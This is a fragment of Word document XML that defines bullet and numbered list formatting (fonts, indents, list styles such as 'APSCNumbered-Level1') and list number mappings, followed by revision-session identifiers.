    <w:lvl w:ilvl="0" w:tplc="277289C6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:pStyle w:val="APSCBoxedbullet1"/>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
    <w:nsid w:val="2F312564"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B99E82CC"/>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bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="680" w:hanging="226"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:hint="default"/>
        <w:color w:val="auto"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="907" w:hanging="227"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
        <w:color w:val="auto"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1134" w:hanging="227"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
        <w:color w:val="auto"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1361" w:hanging="227"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:hint="default"/>
        <w:color w:val="auto"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1588" w:hanging="227"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
        <w:color w:val="auto"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1814" w:hanging="226"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
        <w:color w:val="auto"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2041" w:hanging="227"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:hint="default"/>
        <w:color w:val="auto"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="27">
    <w:nsid w:val="30D63A7E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="427A9C88"/>
    <w:lvl w:ilvl="0" w:tplc="1C80C2C2">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36EE1930"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B99E82CC"/>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bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="680" w:hanging="226"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:hint="default"/>
        <w:color w:val="auto"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="907" w:hanging="227"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
        <w:color w:val="auto"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1134" w:hanging="227"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
        <w:color w:val="auto"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1361" w:hanging="227"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:hint="default"/>
        <w:color w:val="auto"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1588" w:hanging="227"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
        <w:color w:val="auto"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1814" w:hanging="226"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
        <w:color w:val="auto"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2041" w:hanging="227"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:hint="default"/>
        <w:color w:val="auto"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="29">
    <w:nsid w:val="383C0A2F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A0DA78DE"/>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nsid w:val="3C111B93"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FB0212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41104D8E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EB9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CD7688"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="16F067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46A60F5F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C3F07B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488E2233"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B0E4C0D0"/>
    <w:lvl w:ilvl="0" w:tplc="9A3A2640">
      <w:start w:val="6"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="930" w:hanging="570"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:eastAsia="Batang"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0D00FC0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0C78B08A"/>
    <w:lvl w:ilvl="0" w:tplc="A5403B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51921657"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6ADCF0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599C1123"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3500D2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5B1D3378"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8B3AAFC0"/>
    <w:lvl w:ilvl="0" w:tplc="615EC234">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:pStyle w:val="APSCBulletedtex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5B3954DC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="800A8E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5D512EBD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8666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1504FB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="84F87F9E"/>
    <w:lvl w:ilvl="0" w:tplc="A5403B9A">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2">
    <w:nsid w:val="5FFE62CE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="90709C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nsid w:val="6830395D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5FB8B476"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="APSCNumbered-Level1"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="default"/>
        <w:b w:val="0"/>
        <w:i w:val="0"/>
        <w:sz w:val="22"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="680" w:hanging="340"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="default"/>
        <w:sz w:val="22"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="680" w:hanging="340"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="default"/>
        <w:sz w:val="22"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1021" w:hanging="341"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
        <w:sz w:val="22"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1361" w:hanging="340"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="default"/>
        <w:sz w:val="22"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1701" w:hanging="340"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:hint="default"/>
        <w:sz w:val="22"/>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44">
    <w:nsid w:val="696B73FF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7A745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6BD104B5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="769818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6DAE711E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B99E82CC"/>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bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="680" w:hanging="226"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:hint="default"/>
        <w:color w:val="auto"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="907" w:hanging="227"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
        <w:color w:val="auto"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1134" w:hanging="227"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
        <w:color w:val="auto"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1361" w:hanging="227"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:hint="default"/>
        <w:color w:val="auto"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1588" w:hanging="227"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
        <w:color w:val="auto"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1814" w:hanging="226"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
        <w:color w:val="auto"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2041" w:hanging="227"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:hint="default"/>
        <w:color w:val="auto"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="47">
    <w:nsid w:val="6ED93F33"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="83B06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6F1D728A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C2EA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08E3E11"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C7FECD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73B82F68"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B99E82CC"/>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bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="680" w:hanging="226"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:hint="default"/>
        <w:color w:val="auto"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="907" w:hanging="227"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
        <w:color w:val="auto"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1134" w:hanging="227"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
        <w:color w:val="auto"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1361" w:hanging="227"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:hint="default"/>
        <w:color w:val="auto"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1588" w:hanging="227"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
        <w:color w:val="auto"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1814" w:hanging="226"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
        <w:color w:val="auto"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2041" w:hanging="227"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:hint="default"/>
        <w:color w:val="auto"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="51">
    <w:nsid w:val="7405441F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="19B6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6310DBE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BD46A9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763763D8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="389AF0AE"/>
    <w:lvl w:ilvl="0" w:tplc="65E2E91E">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="APSCNumbered-Level2"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="default"/>
        <w:b w:val="0"/>
        <w:i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77C50A97"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AABC629A"/>
    <w:lvl w:ilvl="0" w:tplc="122447CC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:pStyle w:val="APSCBullet-Level5"/>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nsid w:val="7E05518E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E25EAA5A"/>
    <w:lvl w:ilvl="0" w:tplc="0C09000F">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="588" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="0C090019" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1308" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="0C09001B" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2028" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="0C09000F" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2748" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="0C090019" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3468" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="0C09001B" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4188" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="0C09000F" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4908" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="0C090019" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5628" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="0C09001B" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="6348" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="1">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="2">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="3">
    <w:abstractNumId w:val="43"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="46"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="50"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="54"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="8"/>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19"/>
  </w:num>
  <w:num w:numId="27">
    <w:abstractNumId w:val="53"/>
  </w:num>
  <w:num w:numId="28">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="29">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="30">
    <w:abstractNumId w:val="37"/>
  </w:num>
  <w:num w:numId="31">
    <w:abstractNumId w:val="38"/>
  </w:num>
  <w:num w:numId="32">
    <w:abstractNumId w:val="52"/>
  </w:num>
  <w:num w:numId="33">
    <w:abstractNumId w:val="49"/>
  </w:num>
  <w:num w:numId="34">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="35">
    <w:abstractNumId w:val="42"/>
  </w:num>
  <w:num w:numId="36">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="37">
    <w:abstractNumId w:val="33"/>
  </w:num>
  <w:num w:numId="38">
    <w:abstractNumId w:val="35"/>
  </w:num>
  <w:num w:numId="39">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="40">
    <w:abstractNumId w:val="41"/>
  </w:num>
  <w:num w:numId="41">
    <w:abstractNumId w:val="29"/>
  </w:num>
  <w:num w:numId="42">
    <w:abstractNumId w:val="45"/>
  </w:num>
  <w:num w:numId="43">
    <w:abstractNumId w:val="55"/>
  </w:num>
  <w:num w:numId="44">
    <w:abstractNumId w:val="39"/>
  </w:num>
  <w:num w:numId="45">
    <w:abstractNumId w:val="36"/>
  </w:num>
  <w:num w:numId="46">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="47">
    <w:abstractNumId w:val="47"/>
  </w:num>
  <w:num w:numId="48">
    <w:abstractNumId w:val="34"/>
  </w:num>
  <w:num w:numId="49">
    <w:abstractNumId w:val="44"/>
  </w:num>
  <w:num w:numId="50">
    <w:abstractNumId w:val="30"/>
  </w:num>
  <w:num w:numId="51">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="52">
    <w:abstractNumId w:val="32"/>
  </w:num>
  <w:num w:numId="53">
    <w:abstractNumId w:val="48"/>
  </w:num>
  <w:num w:numId="54">
    <w:abstractNumId w:val="40"/>
  </w:num>
  <w:num w:numId="55">
    <w:abstractNumId w:val="31"/>
  </w:num>
  <w:num w:numId="56">
    <w:abstractNumId w:val="51"/>
  </w:num>
  <w:num w:numId="57">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2"/>
  <w:defaultTabStop w:val="567"/>
  <w:drawingGridHorizontalSpacing w:val="11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691"/>
    <w:rsid w:val="000010C0"/>
    <w:rsid w:val="00004FDF"/>
    <w:rsid w:val="00006892"/>
    <w:rsid w:val="000069AB"/>
    <w:rsid w:val="00013288"/>
    <w:rsid w:val="00017369"/>
    <w:rsid w:val="00021258"/>
    <w:rsid w:val="00024C4A"/>
    <w:rsid w:val="000302D1"/>
    <w:rsid w:val="00040D92"/>
    <w:rsid w:val="0004441B"/>
    <w:rsid w:val="00050603"/>
    <w:rsid w:val="00066A6B"/>
    <w:rsid w:val="00067E21"/>
    <w:rsid w:val="00073BD3"/>
    <w:rsid w:val="00074636"/>
    <w:rsid w:val="000757E0"/>
    <w:rsid w:val="00076CA4"/>
    <w:rsid w:val="00083ACB"/>
    <w:rsid w:val="00083CDF"/>
    <w:rsid w:val="00084871"/>
    <w:rsid w:val="00085101"/>
    <w:rsid w:val="00086C24"/>
    <w:rsid w:val="00087EF4"/>
    <w:rsid w:val="000908CC"/>
    <w:rsid w:val="00091C86"/>
    <w:rsid w:val="00091DEC"/>
    <w:rsid w:val="000934DC"/>
    <w:rsid w:val="0009576B"/>
    <w:rsid w:val="000A0921"/>
    <w:rsid w:val="000A27E4"/>
    <w:rsid w:val="000A3367"/>
    <w:rsid w:val="000A5DA8"/>
    <w:rsid w:val="000B3C25"/>
    <w:rsid w:val="000C02B9"/>
    <w:rsid w:val="000C1C31"/>
    <w:rsid w:val="000C3612"/>
    <w:rsid w:val="000C54FB"/>
    <w:rsid w:val="000C55A6"/>
    <w:rsid w:val="000C5661"/>
    <w:rsid w:val="000C6E8B"/>
    <w:rsid w:val="000F0534"/>
    <w:rsid w:val="000F24C8"/>
    <w:rsid w:val="000F3623"/>
    <w:rsid w:val="000F5822"/>
    <w:rsid w:val="001105EE"/>
    <w:rsid w:val="00112169"/>
    <w:rsid w:val="00113A29"/>
    <w:rsid w:val="001140DE"/>
    <w:rsid w:val="00115AF1"/>
    <w:rsid w:val="001160A5"/>
    <w:rsid w:val="001235A7"/>
    <w:rsid w:val="00124C31"/>
    <w:rsid w:val="00126577"/>
    <w:rsid w:val="001360FE"/>
    <w:rsid w:val="00140783"/>
    <w:rsid w:val="00142FE1"/>
    <w:rsid w:val="00143B4C"/>
    <w:rsid w:val="00143F9E"/>
    <w:rsid w:val="001457D2"/>
    <w:rsid w:val="001512B8"/>
    <w:rsid w:val="001532BF"/>
    <w:rsid w:val="001549DF"/>
    <w:rsid w:val="00156CDA"/>
    <w:rsid w:val="00160CE7"/>
    <w:rsid w:val="00162C2E"/>
    <w:rsid w:val="00163727"/>
    <w:rsid w:val="001650AF"/>
    <w:rsid w:val="0016591B"/>
    <w:rsid w:val="00171B13"/>
    <w:rsid w:val="001728A6"/>
    <w:rsid w:val="001751B8"/>
    <w:rsid w:val="001760C6"/>
    <w:rsid w:val="00176102"/>
    <w:rsid w:val="00181343"/>
    <w:rsid w:val="00182227"/>
    <w:rsid w:val="001844DD"/>
    <w:rsid w:val="001868EA"/>
    <w:rsid w:val="00192156"/>
    <w:rsid w:val="001938A1"/>
    <w:rsid w:val="00197786"/>
    <w:rsid w:val="00197979"/>
    <w:rsid w:val="00197D4B"/>
    <w:rsid w:val="001A0010"/>
    <w:rsid w:val="001A1013"/>
    <w:rsid w:val="001A420C"/>
    <w:rsid w:val="001A46B5"/>
    <w:rsid w:val="001A4C0B"/>
    <w:rsid w:val="001A5D13"/>
    <w:rsid w:val="001A6A25"/>
    <w:rsid w:val="001A6F05"/>
    <w:rsid w:val="001B1B9F"/>
    <w:rsid w:val="001B5A1F"/>
    <w:rsid w:val="001B689D"/>
    <w:rsid w:val="001C1AE7"/>
    <w:rsid w:val="001C3AC4"/>
    <w:rsid w:val="001C400F"/>
    <w:rsid w:val="001C438A"/>
    <w:rsid w:val="001C6617"/>
    <w:rsid w:val="001D0202"/>
    <w:rsid w:val="001E0468"/>
    <w:rsid w:val="001E0A60"/>
